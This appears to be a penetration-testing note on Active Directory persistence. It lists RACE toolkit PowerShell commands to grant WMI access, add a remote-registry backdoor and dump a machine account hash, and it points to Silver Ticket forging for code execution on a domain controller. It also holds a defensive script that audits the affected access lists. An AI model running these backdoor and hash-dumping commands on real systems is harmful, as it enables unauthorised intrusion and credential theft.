description = 'Allow remoting privileges on remote machines without being a Domain Admin.'
Remoting Privileges #
The following actions require administrator privileges on the remote machines.
I will research a way to do this with pure PowerShell (if possible); in the meantime, here is how to do it with the RACE toolkit.
Getting WMI #
We can execute WMI queries on remote computers if WMI is enabled and we have access to it.
If we do not have access but do have administrator privileges on the machine, we can grant ourselves access.

```powershell
Set-RemoteWMI -SamAccountName <SamAccountName> -ComputerName <ComputerName> -namespace 'root\cimv2' -Verbose
```
Getting Remote Registry #
Modify the permissions on the remote machine.

```powershell
Add-RemoteRegBackdoor -ComputerName <FQDN of domain> -Trustee <SamAccountName> -Verbose
```

This also allows us to dump the machine account hash.
If executed against a Domain Controller or a service host, we can then forge a Silver Ticket (TGS) that grants code execution (on the DC) or access to the hosted service.
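Both grants above work by changing permissions on the remote host: the DACL of the WMI namespace and the DACL of the registry key that gates remote registry access. As an added defender-side check (example code, not part of the RACE toolkit or of these notes), the same DACLs can be audited for trustees outside a baseline. The key path, the baseline SID list and the Remote Enable bit value are my assumptions; it runs locally in an elevated PowerShell session.

```powershell
# Added audit script (not part of the RACE toolkit or of the original notes): lists allow-ACEs on a
# WMI namespace and on the remote-registry gate key that name a trustee outside a baseline, or that
# grant Remote Enable to a non-Administrators trustee. Baseline SIDs and key paths are assumptions.
$BaselineSids = @(
    'S-1-5-18',      # NT AUTHORITY\SYSTEM
    'S-1-5-19',      # LOCAL SERVICE
    'S-1-5-20',      # NETWORK SERVICE
    'S-1-5-11',      # Authenticated Users (on root\cimv2 by default, without Remote Enable)
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-5-32-551'   # BUILTIN\Backup Operators (read access on the winreg key by default)
)
$AdminsSid        = 'S-1-5-32-544'
$WbemRemoteAccess = 0x20   # WBEM_REMOTE_ACCESS bit of the WMI namespace access mask

function Get-SuspiciousWmiAce {
    param([string]$Namespace = 'root\cimv2')
    $sysSec = Get-CimInstance -Namespace $Namespace -ClassName '__SystemSecurity'
    $r = Invoke-CimMethod -InputObject $sysSec -MethodName 'GetSecurityDescriptor'
    if ($r.ReturnValue -ne 0) { throw "GetSecurityDescriptor on $Namespace returned $($r.ReturnValue)" }
    foreach ($ace in $r.Descriptor.DACL) {
        if ($ace.AceType -ne 0) { continue }                    # 0 = ACCESS_ALLOWED
        $sid    = $ace.Trustee.SIDString
        $remote = ($ace.AccessMask -band $WbemRemoteAccess) -ne 0
        if (($BaselineSids -notcontains $sid) -or ($remote -and $sid -ne $AdminsSid)) {
            [pscustomobject]@{ Location = "WMI:$Namespace"; Trustee = "$($ace.Trustee.Domain)\$($ace.Trustee.Name)"
                               SID = $sid; Rights = ('0x{0:X}' -f $ace.AccessMask); Note = "RemoteEnable=$remote" }
        }
    }
}

function Get-SuspiciousRegistryAce {
    # Key that gates remote registry access; add further keys (SAM, SECURITY, ...) as needed.
    param([string[]]$KeyPath = @('HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'))
    foreach ($path in $KeyPath) {
        try { $acl = Get-Acl -Path $path } catch { Write-Warning "Cannot read ACL on ${path}: $_"; continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { $sid = $ace.IdentityReference.Value }        # unresolvable account: keep the raw value
            if ($BaselineSids -notcontains $sid) {
                [pscustomobject]@{ Location = $path; Trustee = $ace.IdentityReference.Value
                                   SID = $sid; Rights = $ace.RegistryRights.ToString(); Note = "Inherited=$($ace.IsInherited)" }
            }
        }
    }
}

# Every row is a grant to review: a non-baseline trustee on a remote-access gate is a backdoor indicator.
@(Get-SuspiciousWmiAce) + @(Get-SuspiciousRegistryAce) | Format-Table -AutoSize
```

An empty result only means the audited DACLs match the assumed baseline; compare the output against a known-good host before treating a row as a finding.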
Dump Machine Hash #
Get the machine account hash from the remote machine.

```powershell
Get-RemoteMachineAccountHash -ComputerName <ComputerName> -Verbose
```
Create Silver Ticket for code execution on DC #
See the Kerberos section.